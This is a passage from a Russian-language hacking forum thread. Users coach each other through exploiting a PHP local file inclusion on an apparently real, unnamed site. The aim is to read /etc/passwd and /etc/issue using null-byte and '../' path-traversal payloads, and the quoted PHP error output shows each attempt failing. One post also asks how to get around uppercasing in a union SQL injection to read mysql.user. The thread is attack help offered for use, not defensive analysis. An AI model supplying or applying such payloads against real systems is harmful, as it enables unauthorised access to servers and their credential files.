Старый 22.02.2014, 09:28   #3121
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Нет, я с base64_decode сделал
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 24.02.2014, 12:47   #3122
smirk
 
Регистрация: 30.01.2013
Сообщений: 15
Репутация: 0
По умолчанию

Наверно глупый вопрос, но все же
Есть пхп инъекция:
http://site/rt.php?them=11'
Цитата:
Warning: include(rt11'.inc): failed to open stream: No such file or directory in /home/site/public_html/rt.php on line 42

Warning: include(rt11'.inc): failed to open stream: No such file or directory in /home/site/public_html/rt.php on line 42

Warning: include(): Failed opening 'rt11'.inc' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/rt.php on line 42
думал прочитать /etc/passwd , нулевой байт работает, все норм. но фишка в том, что в начало дописывается префикс rt
http://site/rt.php?them=/etc/passwd%00
Цитата:
Warning: include(): Failed opening 'rt/etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/rt.php on line 42
Возможно ли это обойти? По логике можно прочитать rt.php , но
http://site/rt.php?them=.php%00
Цитата:
Warning: include(): Failed opening 'rt.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/rt.php on line 42
Заранее спасибо.
smirk вне форума   Ответить с цитированием
Старый 24.02.2014, 12:59   #3123
VirusVFV
 
Регистрация: 10.01.2014
Сообщений: 11
Репутация: 0
По умолчанию

Есть union based SQL-инъекция. Но проблема в том, что перед отправкой запроса производится перевод параметра в верхний регистр.
Соответственно при указании таблицы - mysql.user преобразуется в MYSQL.USER и запрос заканчивается ошибкой.
Сталкивался ли кто-нибудь с подобными проблемами и как обходили ?
спс.
VirusVFV вне форума   Ответить с цитированием
Старый 24.02.2014, 13:07   #3124
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Цитата:
Сообщение от smirk Посмотреть сообщение
Наверно глупый вопрос, но все же
Есть пхп инъекция:
http://site/rt.php?them=11'


думал прочитать /etc/passwd , нулевой байт работает, все норм. но фишка в том, что в начало дописывается префикс rt
http://site/rt.php?them=/etc/passwd%00


Возможно ли это обойти? По логике можно прочитать rt.php , но
http://site/rt.php?them=.php%00

Заранее спасибо.
them=/../../../../../../../../../../../etc/passwd%00
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 24.02.2014, 13:21   #3125
smirk
 
Регистрация: 30.01.2013
Сообщений: 15
Репутация: 0
По умолчанию

Цитата:
Сообщение от m0Hze Посмотреть сообщение
them=/../../../../../../../../../../../etc/passwd%00
Я пробовал так обойти, но
http://site/rt.php?them=/../../../../../../../../../../../etc/passwd%00
Цитата:
Warning: include(): Failed opening 'rt/../../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/rt.php on line 42
smirk вне форума   Ответить с цитированием
Старый 24.02.2014, 15:12   #3126
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

А все понял, чтото не обралтил внимания на наличие слеша вначале.
Почитай статью про инклуды здесь, там есть инфа по этой теме если не ошибаюсь, про относительные и абсолютные пути.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 24.02.2014, 17:13   #3127
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

smirk, а попробуй /etc/issue подключить.
Тут же не должно быть разницы с относительным или абсолютным путем.
denwer так не ругается, но хз как себя XAMPP поведет, вдруг вообще винда?
Узнай ось, короче.
И ищи i.php =)
HeartLESS вне форума   Ответить с цитированием
Старый 24.02.2014, 18:28   #3128
smirk
 
Регистрация: 30.01.2013
Сообщений: 15
Репутация: 0
По умолчанию

Цитата:
Сообщение от HeartLESS Посмотреть сообщение
smirk, а попробуй /etc/issue подключить.
Тут же не должно быть разницы с относительным или абсолютным путем.
denwer так не ругается, но хз как себя XAMPP поведет, вдруг вообще винда?
Узнай ось, короче.
И ищи i.php =)
http://site/rt.php?them=/etc/issue%00
Цитата:
Warning: include(): Failed opening 'rt/etc/issue' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/rt.php on line 42
Ось: линукс, сервер: апач
phpinfo есть)

Последний раз редактировалось smirk; 24.02.2014 в 18:37..
smirk вне форума   Ответить с цитированием
Старый 24.02.2014, 18:50   #3129
Beched
 
Регистрация: 06.07.2010
Сообщений: 402
Репутация: 118
По умолчанию

Вы наркоманы, нулл-байт давно не работает
Beched вне форума   Ответить с цитированием
Старый 24.02.2014, 21:01   #3130
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от Beched Посмотреть сообщение
Вы наркоманы, нулл-байт давно не работает
Пес, мало ли, не все нуллбайты одинаково не работают

smirk:

http://site/rt.php?them=../../../../../../../../etc/issue%00

сделай.
HeartLESS вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot